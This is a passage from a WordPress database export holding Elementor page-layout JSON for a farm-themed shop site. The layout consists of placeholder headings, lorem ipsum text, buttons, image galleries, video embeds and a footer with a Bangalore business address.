here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"14a6bb1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"785d463\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#E1D7D74F\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5ccfaed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8e25cb7\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"f4996be\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6f2a1f5\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"24f8373\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3cd3a5c\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"dc5078a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0324abe\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c08eed2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3845821\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d7c7592\",\"elType\":\"widget\",\"settings\":{\"form_id\":\"1527\"},\"elements\":[],\"widgetType\":\"wpforms\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8939,1536,'_elementor_page_assets','a:0:{}'),(8941,1537,'_elementor_edit_mode','builder'),(8942,1537,'_elementor_template_type','wp-page'),(8943,1537,'_elementor_version','3.7.8'),(8944,1537,'_wp_page_template','elementor_canvas'),(8945,1537,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}]},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\